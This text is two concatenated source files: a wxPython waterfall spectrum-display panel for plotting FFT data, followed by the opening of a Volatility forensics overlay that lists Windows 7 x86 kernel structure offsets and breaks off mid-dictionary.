class waterfall_window(wx.Panel, pubsub.pubsub):
	"""
	Waterfall display panel: a waterfall plotter plus its control panel.
	Proxies the fft block-chain keys from the controller and feeds FFT
	frames arriving on the message queue into the plotter.
	"""
	def __init__(
		self,
		parent,
		controller,
		size,
		title,
		real,
		fft_size,
		num_lines,
		decimation_key,
		baseband_freq,
		sample_rate_key,
		frame_rate_key,
		dynamic_range,
		ref_level,
		average_key,
		avg_alpha_key,
		msg_key,
	):
		pubsub.pubsub.__init__(self)
		#setup
		self.samples = list()
		self.real = real
		self.fft_size = fft_size
		#proxy the keys (local pubsub keys forward to the controller's keys)
		self.proxy(MSG_KEY, controller, msg_key)
		self.proxy(DECIMATION_KEY, controller, decimation_key)
		self.proxy(FRAME_RATE_KEY, controller, frame_rate_key)
		self.proxy(AVERAGE_KEY, controller, average_key)
		self.proxy(AVG_ALPHA_KEY, controller, avg_alpha_key)
		self.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key)
		#init panel and plot
		wx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER)
		self.plotter = plotter.waterfall_plotter(self)
		self.plotter.SetSize(wx.Size(*size))
		self.plotter.SetSizeHints(*size)
		self.plotter.set_title(title)
		self.plotter.enable_point_label(True)
		self.plotter.enable_grid_lines(False)
		#plotter listeners
		self.subscribe(COLOR_MODE_KEY, self.plotter.set_color_mode)
		self.subscribe(NUM_LINES_KEY, self.plotter.set_num_lines)
		#initialize values
		self[DYNAMIC_RANGE_KEY] = dynamic_range
		self[NUM_LINES_KEY] = num_lines
		self[Y_DIVS_KEY] = 8
		self[X_DIVS_KEY] = 8 #approximate
		self[REF_LEVEL_KEY] = ref_level
		self[BASEBAND_FREQ_KEY] = baseband_freq
		#set twice: first value primes the subscriber, second applies the pref
		self[COLOR_MODE_KEY] = COLOR_MODES[0][1]
		self[COLOR_MODE_KEY] = DEFAULT_COLOR_MODE
		self[RUNNING_KEY] = True
		#setup the box with plot and controls
		self.control_panel = control_panel(self)
		main_box = wx.BoxSizer(wx.HORIZONTAL)
		main_box.Add(self.plotter, 1, wx.EXPAND)
		main_box.Add(self.control_panel, 0, wx.EXPAND)
		self.SetSizerAndFit(main_box)
		#register events
		self.subscribe(MSG_KEY, self.handle_msg)
		for key in (
			DECIMATION_KEY, SAMPLE_RATE_KEY, FRAME_RATE_KEY,
			BASEBAND_FREQ_KEY, X_DIVS_KEY, Y_DIVS_KEY, NUM_LINES_KEY,
		): self.subscribe(key, self.update_grid)
		#initial update
		self.update_grid()
	def set_callback(self,callb):
		"""Forward a callback to the underlying waterfall plotter."""
		self.plotter.set_callback(callb)
	def autoscale(self, *args):
		"""
		Autoscale the waterfall plot to the last frame.
		Set the dynamic range and reference level.
		Does not affect the current data in the waterfall.
		"""
		if not len(self.samples): return
		min_level, max_level = common.get_min_max_fft(self.samples)
		#set the range and level
		self[DYNAMIC_RANGE_KEY] = common.get_clean_num(max_level - min_level)
		self[REF_LEVEL_KEY] = DYNAMIC_RANGE_STEP*round(.5+max_level/DYNAMIC_RANGE_STEP)
	def handle_msg(self, msg):
		"""
		Handle the message from the fft sink message queue.
		If complex, reorder the fft samples so the negative bins come first.
		If real, keep take only the positive bins.
		Send the data to the plotter.
		Args:
			msg: the fft array as a character array
		"""
		if not self[RUNNING_KEY]: return
		#convert to floating point numbers
		self.samples = samples = numpy.fromstring(msg, numpy.float32)[:self.fft_size] #only take first frame
		num_samps = len(samples)
		#reorder fft
		if self.real: samples = samples[:(num_samps+1)/2]
		else: samples = numpy.concatenate((samples[num_samps/2+1:], samples[:(num_samps+1)/2]))
		#plot the fft
		self.plotter.set_samples(
			samples=samples,
			minimum=self[REF_LEVEL_KEY] - self[DYNAMIC_RANGE_KEY],
			maximum=self[REF_LEVEL_KEY],
		)
		#update the plotter
		self.plotter.update()
	def update_grid(self, *args):
		"""
		Update the plotter grid.
		This update method is dependent on the variables below.
		Determine the x and y axis grid parameters.
		The x axis depends on sample rate, baseband freq, and x divs.
		The y axis depends on y per div, y divs, and ref level.
		"""
		#grid parameters
		sample_rate = self[SAMPLE_RATE_KEY]
		frame_rate = self[FRAME_RATE_KEY]
		if frame_rate < 1.0 :
			frame_rate = 1.0
		baseband_freq = self[BASEBAND_FREQ_KEY]
		num_lines = self[NUM_LINES_KEY]
		y_divs = self[Y_DIVS_KEY]
		x_divs = self[X_DIVS_KEY]
		#determine best fitting x_per_div (real spectra span half the rate)
		if self.real: x_width = sample_rate/2.0
		else: x_width = sample_rate/1.0
		x_per_div = common.get_clean_num(x_width/x_divs)
		#update the x grid
		if self.real:
			self.plotter.set_x_grid(
				baseband_freq,
				baseband_freq + sample_rate/2.0,
				x_per_div, True,
			)
		else:
			self.plotter.set_x_grid(
				baseband_freq - sample_rate/2.0,
				baseband_freq + sample_rate/2.0,
				x_per_div, True,
			)
		#update x units
		self.plotter.set_x_label('Frequency', 'Hz')
		#update y grid (duration in seconds covered by the visible lines)
		duration = float(num_lines)/frame_rate
		y_per_div = common.get_clean_num(duration/y_divs)
		self.plotter.set_y_grid(0, duration, y_per_div, True)
		#update y units
		self.plotter.set_y_label('Time', 's')
		#update plotter
		self.plotter.update()
| gpl-3.0 |
Echelon85/volatility | volatility/plugins/overlays/windows/win7_sp0_x86_vtypes.py | 58 | 471672 | ntkrnlmp_types = {
'_u' : [ 0x50, {
'KeyNode' : [ 0x0, ['_CM_KEY_NODE']],
'KeyValue' : [ 0x0, ['_CM_KEY_VALUE']],
'KeySecurity' : [ 0x0, ['_CM_KEY_SECURITY']],
'KeyIndex' : [ 0x0, ['_CM_KEY_INDEX']],
'ValueData' : [ 0x0, ['_CM_BIG_DATA']],
'KeyList' : [ 0x0, ['array', 1, ['unsigned long']]],
'KeyString' : [ 0x0, ['array', 1, ['wchar']]],
} ],
'_GENERAL_LOOKASIDE_POOL' : [ 0x48, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'SingleListHead' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'AllocateHits' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'FreeHits' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'Tag' : [ 0x20, ['unsigned long']],
'Size' : [ 0x24, ['unsigned long']],
'AllocateEx' : [ 0x28, ['pointer', ['void']]],
'Allocate' : [ 0x28, ['pointer', ['void']]],
'FreeEx' : [ 0x2c, ['pointer', ['void']]],
'Free' : [ 0x2c, ['pointer', ['void']]],
'ListEntry' : [ 0x30, ['_LIST_ENTRY']],
'LastTotalAllocates' : [ 0x38, ['unsigned long']],
'LastAllocateMisses' : [ 0x3c, ['unsigned long']],
'LastAllocateHits' : [ 0x3c, ['unsigned long']],
'Future' : [ 0x40, ['array', 2, ['unsigned long']]],
} ],
'_RTL_DYNAMIC_HASH_TABLE_ENTRY' : [ 0xc, {
'Linkage' : [ 0x0, ['_LIST_ENTRY']],
'Signature' : [ 0x8, ['unsigned long']],
} ],
'__unnamed_2008' : [ 0x4, {
'AsULONG' : [ 0x0, ['unsigned long']],
'IncreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned long')]],
'DecreasePolicy' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 4, native_type='unsigned long')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
} ],
'_PPM_PERF_STATES' : [ 0x80, {
'Count' : [ 0x0, ['unsigned long']],
'MaxFrequency' : [ 0x4, ['unsigned long']],
'PStateCap' : [ 0x8, ['unsigned long']],
'TStateCap' : [ 0xc, ['unsigned long']],
'MaxPerfState' : [ 0x10, ['unsigned long']],
'MinPerfState' : [ 0x14, ['unsigned long']],
'LowestPState' : [ 0x18, ['unsigned long']],
'IncreaseTime' : [ 0x1c, ['unsigned long']],
'DecreaseTime' : [ 0x20, ['unsigned long']],
'BusyAdjThreshold' : [ 0x24, ['unsigned char']],
'Reserved' : [ 0x25, ['unsigned char']],
'ThrottleStatesOnly' : [ 0x26, ['unsigned char']],
'PolicyType' : [ 0x27, ['unsigned char']],
'TimerInterval' : [ 0x28, ['unsigned long']],
'Flags' : [ 0x2c, ['__unnamed_2008']],
'TargetProcessors' : [ 0x30, ['_KAFFINITY_EX']],
'PStateHandler' : [ 0x3c, ['pointer', ['void']]],
'PStateContext' : [ 0x40, ['unsigned long']],
'TStateHandler' : [ 0x44, ['pointer', ['void']]],
'TStateContext' : [ 0x48, ['unsigned long']],
'FeedbackHandler' : [ 0x4c, ['pointer', ['void']]],
'GetFFHThrottleState' : [ 0x50, ['pointer', ['void']]],
'State' : [ 0x58, ['array', 1, ['_PPM_PERF_STATE']]],
} ],
'_M128A' : [ 0x10, {
'Low' : [ 0x0, ['unsigned long long']],
'High' : [ 0x8, ['long long']],
} ],
'_HEAP_LOOKASIDE' : [ 0x30, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'LastTotalAllocates' : [ 0x1c, ['unsigned long']],
'LastAllocateMisses' : [ 0x20, ['unsigned long']],
'Counters' : [ 0x24, ['array', 2, ['unsigned long']]],
} ],
'_WMI_TRACE_PACKET' : [ 0x4, {
'Size' : [ 0x0, ['unsigned short']],
'HookId' : [ 0x2, ['unsigned short']],
'Type' : [ 0x2, ['unsigned char']],
'Group' : [ 0x3, ['unsigned char']],
} ],
'_KTIMER' : [ 0x28, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'DueTime' : [ 0x10, ['_ULARGE_INTEGER']],
'TimerListEntry' : [ 0x18, ['_LIST_ENTRY']],
'Dpc' : [ 0x20, ['pointer', ['_KDPC']]],
'Period' : [ 0x24, ['unsigned long']],
} ],
'_RTL_ATOM_TABLE' : [ 0x44, {
'Signature' : [ 0x0, ['unsigned long']],
'CriticalSection' : [ 0x4, ['_RTL_CRITICAL_SECTION']],
'RtlHandleTable' : [ 0x1c, ['_RTL_HANDLE_TABLE']],
'NumberOfBuckets' : [ 0x3c, ['unsigned long']],
'Buckets' : [ 0x40, ['array', 1, ['pointer', ['_RTL_ATOM_TABLE_ENTRY']]]],
} ],
'_POP_POWER_ACTION' : [ 0xb0, {
'Updates' : [ 0x0, ['unsigned char']],
'State' : [ 0x1, ['unsigned char']],
'Shutdown' : [ 0x2, ['unsigned char']],
'Action' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'PowerActionNone', 1: 'PowerActionReserved', 2: 'PowerActionSleep', 3: 'PowerActionHibernate', 4: 'PowerActionShutdown', 5: 'PowerActionShutdownReset', 6: 'PowerActionShutdownOff', 7: 'PowerActionWarmEject'})]],
'LightestState' : [ 0x8, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'Flags' : [ 0xc, ['unsigned long']],
'Status' : [ 0x10, ['long']],
'DeviceType' : [ 0x14, ['Enumeration', dict(target = 'long', choices = {0: 'PolicyDeviceSystemButton', 1: 'PolicyDeviceThermalZone', 2: 'PolicyDeviceBattery', 3: 'PolicyDeviceMemory', 4: 'PolicyInitiatePowerActionAPI', 5: 'PolicySetPowerStateAPI', 6: 'PolicyImmediateDozeS4', 7: 'PolicySystemIdle', 8: 'PolicyDeviceMax'})]],
'DeviceTypeFlags' : [ 0x18, ['unsigned long']],
'IrpMinor' : [ 0x1c, ['unsigned char']],
'Waking' : [ 0x1d, ['unsigned char']],
'SystemState' : [ 0x20, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'NextSystemState' : [ 0x24, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'EffectiveSystemState' : [ 0x28, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'CurrentSystemState' : [ 0x2c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'ShutdownBugCode' : [ 0x30, ['pointer', ['_POP_SHUTDOWN_BUG_CHECK']]],
'DevState' : [ 0x34, ['pointer', ['_POP_DEVICE_SYS_STATE']]],
'HiberContext' : [ 0x38, ['pointer', ['_POP_HIBER_CONTEXT']]],
'WakeTime' : [ 0x40, ['unsigned long long']],
'SleepTime' : [ 0x48, ['unsigned long long']],
'ProgrammedRTCTime' : [ 0x50, ['unsigned long long']],
'WakeOnRTC' : [ 0x58, ['unsigned char']],
'WakeTimerInfo' : [ 0x5c, ['pointer', ['_DIAGNOSTIC_BUFFER']]],
'FilteredCapabilities' : [ 0x60, ['SYSTEM_POWER_CAPABILITIES']],
} ],
'_CM_KEY_VALUE' : [ 0x18, {
'Signature' : [ 0x0, ['unsigned short']],
'NameLength' : [ 0x2, ['unsigned short']],
'DataLength' : [ 0x4, ['unsigned long']],
'Data' : [ 0x8, ['unsigned long']],
'Type' : [ 0xc, ['unsigned long']],
'Flags' : [ 0x10, ['unsigned short']],
'Spare' : [ 0x12, ['unsigned short']],
'Name' : [ 0x14, ['array', 1, ['wchar']]],
} ],
'_AMD64_DBGKD_CONTROL_SET' : [ 0x1c, {
'TraceFlag' : [ 0x0, ['unsigned long']],
'Dr7' : [ 0x4, ['unsigned long long']],
'CurrentSymbolStart' : [ 0xc, ['unsigned long long']],
'CurrentSymbolEnd' : [ 0x14, ['unsigned long long']],
} ],
'_PO_DEVICE_NOTIFY' : [ 0x3c, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'PowerChildren' : [ 0x8, ['_LIST_ENTRY']],
'PowerParents' : [ 0x10, ['_LIST_ENTRY']],
'TargetDevice' : [ 0x18, ['pointer', ['_DEVICE_OBJECT']]],
'OrderLevel' : [ 0x1c, ['unsigned char']],
'DeviceObject' : [ 0x20, ['pointer', ['_DEVICE_OBJECT']]],
'DeviceName' : [ 0x24, ['pointer', ['unsigned short']]],
'DriverName' : [ 0x28, ['pointer', ['unsigned short']]],
'ChildCount' : [ 0x2c, ['unsigned long']],
'ActiveChild' : [ 0x30, ['unsigned long']],
'ParentCount' : [ 0x34, ['unsigned long']],
'ActiveParent' : [ 0x38, ['unsigned long']],
} ],
'_CM_KEY_SECURITY_CACHE_ENTRY' : [ 0x8, {
'Cell' : [ 0x0, ['unsigned long']],
'CachedSecurity' : [ 0x4, ['pointer', ['_CM_KEY_SECURITY_CACHE']]],
} ],
'_FS_FILTER_CALLBACK_DATA' : [ 0x24, {
'SizeOfFsFilterCallbackData' : [ 0x0, ['unsigned long']],
'Operation' : [ 0x4, ['unsigned char']],
'Reserved' : [ 0x5, ['unsigned char']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'FileObject' : [ 0xc, ['pointer', ['_FILE_OBJECT']]],
'Parameters' : [ 0x10, ['_FS_FILTER_PARAMETERS']],
} ],
'_GDI_TEB_BATCH32' : [ 0x4e0, {
'Offset' : [ 0x0, ['unsigned long']],
'HDC' : [ 0x4, ['unsigned long']],
'Buffer' : [ 0x8, ['array', 310, ['unsigned long']]],
} ],
'_PROC_IDLE_STATE_ACCOUNTING' : [ 0x228, {
'TotalTime' : [ 0x0, ['unsigned long long']],
'IdleTransitions' : [ 0x8, ['unsigned long']],
'FailedTransitions' : [ 0xc, ['unsigned long']],
'InvalidBucketIndex' : [ 0x10, ['unsigned long']],
'MinTime' : [ 0x18, ['unsigned long long']],
'MaxTime' : [ 0x20, ['unsigned long long']],
'IdleTimeBuckets' : [ 0x28, ['array', 16, ['_PROC_IDLE_STATE_BUCKET']]],
} ],
'_IMAGE_SECURITY_CONTEXT' : [ 0x4, {
'PageHashes' : [ 0x0, ['pointer', ['void']]],
'Value' : [ 0x0, ['unsigned long']],
'SecurityBeingCreated' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'SecurityMandatory' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'PageHashPointer' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
} ],
'__unnamed_204b' : [ 0x4, {
'Level' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_204d' : [ 0x4, {
'Type' : [ 0x0, ['unsigned long']],
} ],
'_POP_ACTION_TRIGGER' : [ 0x10, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'PolicyDeviceSystemButton', 1: 'PolicyDeviceThermalZone', 2: 'PolicyDeviceBattery', 3: 'PolicyDeviceMemory', 4: 'PolicyInitiatePowerActionAPI', 5: 'PolicySetPowerStateAPI', 6: 'PolicyImmediateDozeS4', 7: 'PolicySystemIdle', 8: 'PolicyDeviceMax'})]],
'Flags' : [ 0x4, ['unsigned long']],
'Wait' : [ 0x8, ['pointer', ['_POP_TRIGGER_WAIT']]],
'Battery' : [ 0xc, ['__unnamed_204b']],
'Button' : [ 0xc, ['__unnamed_204d']],
} ],
'_KENLISTMENT_HISTORY' : [ 0x8, {
'Notification' : [ 0x0, ['unsigned long']],
'NewState' : [ 0x4, ['Enumeration', dict(target = 'long', choices = {0: 'KEnlistmentUninitialized', 256: 'KEnlistmentActive', 258: 'KEnlistmentPrepared', 259: 'KEnlistmentInDoubt', 260: 'KEnlistmentCommitted', 261: 'KEnlistmentCommittedNotify', 262: 'KEnlistmentCommitRequested', 257: 'KEnlistmentPreparing', 264: 'KEnlistmentDelegated', 265: 'KEnlistmentDelegatedDisconnected', 266: 'KEnlistmentPrePreparing', 263: 'KEnlistmentAborted', 268: 'KEnlistmentRecovering', 269: 'KEnlistmentAborting', 270: 'KEnlistmentReadOnly', 271: 'KEnlistmentOutcomeUnavailable', 272: 'KEnlistmentOffline', 273: 'KEnlistmentPrePrepared', 274: 'KEnlistmentInitialized', 267: 'KEnlistmentForgotten'})]],
} ],
'_FAST_IO_DISPATCH' : [ 0x70, {
'SizeOfFastIoDispatch' : [ 0x0, ['unsigned long']],
'FastIoCheckIfPossible' : [ 0x4, ['pointer', ['void']]],
'FastIoRead' : [ 0x8, ['pointer', ['void']]],
'FastIoWrite' : [ 0xc, ['pointer', ['void']]],
'FastIoQueryBasicInfo' : [ 0x10, ['pointer', ['void']]],
'FastIoQueryStandardInfo' : [ 0x14, ['pointer', ['void']]],
'FastIoLock' : [ 0x18, ['pointer', ['void']]],
'FastIoUnlockSingle' : [ 0x1c, ['pointer', ['void']]],
'FastIoUnlockAll' : [ 0x20, ['pointer', ['void']]],
'FastIoUnlockAllByKey' : [ 0x24, ['pointer', ['void']]],
'FastIoDeviceControl' : [ 0x28, ['pointer', ['void']]],
'AcquireFileForNtCreateSection' : [ 0x2c, ['pointer', ['void']]],
'ReleaseFileForNtCreateSection' : [ 0x30, ['pointer', ['void']]],
'FastIoDetachDevice' : [ 0x34, ['pointer', ['void']]],
'FastIoQueryNetworkOpenInfo' : [ 0x38, ['pointer', ['void']]],
'AcquireForModWrite' : [ 0x3c, ['pointer', ['void']]],
'MdlRead' : [ 0x40, ['pointer', ['void']]],
'MdlReadComplete' : [ 0x44, ['pointer', ['void']]],
'PrepareMdlWrite' : [ 0x48, ['pointer', ['void']]],
'MdlWriteComplete' : [ 0x4c, ['pointer', ['void']]],
'FastIoReadCompressed' : [ 0x50, ['pointer', ['void']]],
'FastIoWriteCompressed' : [ 0x54, ['pointer', ['void']]],
'MdlReadCompleteCompressed' : [ 0x58, ['pointer', ['void']]],
'MdlWriteCompleteCompressed' : [ 0x5c, ['pointer', ['void']]],
'FastIoQueryOpen' : [ 0x60, ['pointer', ['void']]],
'ReleaseForModWrite' : [ 0x64, ['pointer', ['void']]],
'AcquireForCcFlush' : [ 0x68, ['pointer', ['void']]],
'ReleaseForCcFlush' : [ 0x6c, ['pointer', ['void']]],
} ],
'_CM_CELL_REMAP_BLOCK' : [ 0x8, {
'OldCell' : [ 0x0, ['unsigned long']],
'NewCell' : [ 0x4, ['unsigned long']],
} ],
'_OBJECT_DIRECTORY_ENTRY' : [ 0xc, {
'ChainLink' : [ 0x0, ['pointer', ['_OBJECT_DIRECTORY_ENTRY']]],
'Object' : [ 0x4, ['pointer', ['void']]],
'HashValue' : [ 0x8, ['unsigned long']],
} ],
'_LOADER_PARAMETER_EXTENSION' : [ 0xe8, {
'Size' : [ 0x0, ['unsigned long']],
'Profile' : [ 0x4, ['_PROFILE_PARAMETER_BLOCK']],
'EmInfFileImage' : [ 0x14, ['pointer', ['void']]],
'EmInfFileSize' : [ 0x18, ['unsigned long']],
'TriageDumpBlock' : [ 0x1c, ['pointer', ['void']]],
'LoaderPagesSpanned' : [ 0x20, ['unsigned long']],
'HeadlessLoaderBlock' : [ 0x24, ['pointer', ['_HEADLESS_LOADER_BLOCK']]],
'SMBiosEPSHeader' : [ 0x28, ['pointer', ['_SMBIOS_TABLE_HEADER']]],
'DrvDBImage' : [ 0x2c, ['pointer', ['void']]],
'DrvDBSize' : [ 0x30, ['unsigned long']],
'NetworkLoaderBlock' : [ 0x34, ['pointer', ['_NETWORK_LOADER_BLOCK']]],
'HalpIRQLToTPR' : [ 0x38, ['pointer', ['unsigned char']]],
'HalpVectorToIRQL' : [ 0x3c, ['pointer', ['unsigned char']]],
'FirmwareDescriptorListHead' : [ 0x40, ['_LIST_ENTRY']],
'AcpiTable' : [ 0x48, ['pointer', ['void']]],
'AcpiTableSize' : [ 0x4c, ['unsigned long']],
'LastBootSucceeded' : [ 0x50, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'LastBootShutdown' : [ 0x50, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'IoPortAccessSupported' : [ 0x50, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'Reserved' : [ 0x50, ['BitField', dict(start_bit = 3, end_bit = 32, native_type='unsigned long')]],
'LoaderPerformanceData' : [ 0x54, ['pointer', ['_LOADER_PERFORMANCE_DATA']]],
'BootApplicationPersistentData' : [ 0x58, ['_LIST_ENTRY']],
'WmdTestResult' : [ 0x60, ['pointer', ['void']]],
'BootIdentifier' : [ 0x64, ['_GUID']],
'ResumePages' : [ 0x74, ['unsigned long']],
'DumpHeader' : [ 0x78, ['pointer', ['void']]],
'BgContext' : [ 0x7c, ['pointer', ['void']]],
'NumaLocalityInfo' : [ 0x80, ['pointer', ['void']]],
'NumaGroupAssignment' : [ 0x84, ['pointer', ['void']]],
'AttachedHives' : [ 0x88, ['_LIST_ENTRY']],
'MemoryCachingRequirementsCount' : [ 0x90, ['unsigned long']],
'MemoryCachingRequirements' : [ 0x94, ['pointer', ['void']]],
'TpmBootEntropyResult' : [ 0x98, ['_TPM_BOOT_ENTROPY_LDR_RESULT']],
'ProcessorCounterFrequency' : [ 0xe0, ['unsigned long long']],
} ],
'_PI_RESOURCE_ARBITER_ENTRY' : [ 0x38, {
'DeviceArbiterList' : [ 0x0, ['_LIST_ENTRY']],
'ResourceType' : [ 0x8, ['unsigned char']],
'ArbiterInterface' : [ 0xc, ['pointer', ['_ARBITER_INTERFACE']]],
'DeviceNode' : [ 0x10, ['pointer', ['_DEVICE_NODE']]],
'ResourceList' : [ 0x14, ['_LIST_ENTRY']],
'BestResourceList' : [ 0x1c, ['_LIST_ENTRY']],
'BestConfig' : [ 0x24, ['_LIST_ENTRY']],
'ActiveArbiterList' : [ 0x2c, ['_LIST_ENTRY']],
'State' : [ 0x34, ['unsigned char']],
'ResourcesChanged' : [ 0x35, ['unsigned char']],
} ],
'_SECURITY_DESCRIPTOR' : [ 0x14, {
'Revision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'Control' : [ 0x2, ['unsigned short']],
'Owner' : [ 0x4, ['pointer', ['void']]],
'Group' : [ 0x8, ['pointer', ['void']]],
'Sacl' : [ 0xc, ['pointer', ['_ACL']]],
'Dacl' : [ 0x10, ['pointer', ['_ACL']]],
} ],
'_RTL_USER_PROCESS_PARAMETERS' : [ 0x298, {
'MaximumLength' : [ 0x0, ['unsigned long']],
'Length' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'DebugFlags' : [ 0xc, ['unsigned long']],
'ConsoleHandle' : [ 0x10, ['pointer', ['void']]],
'ConsoleFlags' : [ 0x14, ['unsigned long']],
'StandardInput' : [ 0x18, ['pointer', ['void']]],
'StandardOutput' : [ 0x1c, ['pointer', ['void']]],
'StandardError' : [ 0x20, ['pointer', ['void']]],
'CurrentDirectory' : [ 0x24, ['_CURDIR']],
'DllPath' : [ 0x30, ['_UNICODE_STRING']],
'ImagePathName' : [ 0x38, ['_UNICODE_STRING']],
'CommandLine' : [ 0x40, ['_UNICODE_STRING']],
'Environment' : [ 0x48, ['pointer', ['void']]],
'StartingX' : [ 0x4c, ['unsigned long']],
'StartingY' : [ 0x50, ['unsigned long']],
'CountX' : [ 0x54, ['unsigned long']],
'CountY' : [ 0x58, ['unsigned long']],
'CountCharsX' : [ 0x5c, ['unsigned long']],
'CountCharsY' : [ 0x60, ['unsigned long']],
'FillAttribute' : [ 0x64, ['unsigned long']],
'WindowFlags' : [ 0x68, ['unsigned long']],
'ShowWindowFlags' : [ 0x6c, ['unsigned long']],
'WindowTitle' : [ 0x70, ['_UNICODE_STRING']],
'DesktopInfo' : [ 0x78, ['_UNICODE_STRING']],
'ShellInfo' : [ 0x80, ['_UNICODE_STRING']],
'RuntimeData' : [ 0x88, ['_UNICODE_STRING']],
'CurrentDirectores' : [ 0x90, ['array', 32, ['_RTL_DRIVE_LETTER_CURDIR']]],
'EnvironmentSize' : [ 0x290, ['unsigned long']],
'EnvironmentVersion' : [ 0x294, ['unsigned long']],
} ],
'_PHYSICAL_MEMORY_RUN' : [ 0x8, {
'BasePage' : [ 0x0, ['unsigned long']],
'PageCount' : [ 0x4, ['unsigned long']],
} ],
'_RTL_SRWLOCK' : [ 0x4, {
'Locked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Waiting' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Waking' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'MultipleShared' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Shared' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_ALPC_MESSAGE_ZONE' : [ 0x18, {
'Mdl' : [ 0x0, ['pointer', ['_MDL']]],
'UserVa' : [ 0x4, ['pointer', ['void']]],
'UserLimit' : [ 0x8, ['pointer', ['void']]],
'SystemVa' : [ 0xc, ['pointer', ['void']]],
'SystemLimit' : [ 0x10, ['pointer', ['void']]],
'Size' : [ 0x14, ['unsigned long']],
} ],
'_KTMOBJECT_NAMESPACE_LINK' : [ 0x14, {
'Links' : [ 0x0, ['_RTL_BALANCED_LINKS']],
'Expired' : [ 0x10, ['unsigned char']],
} ],
'_CACHE_MANAGER_CALLBACKS' : [ 0x10, {
'AcquireForLazyWrite' : [ 0x0, ['pointer', ['void']]],
'ReleaseFromLazyWrite' : [ 0x4, ['pointer', ['void']]],
'AcquireForReadAhead' : [ 0x8, ['pointer', ['void']]],
'ReleaseFromReadAhead' : [ 0xc, ['pointer', ['void']]],
} ],
'_PROC_PERF_LOAD' : [ 0x2, {
'BusyPercentage' : [ 0x0, ['unsigned char']],
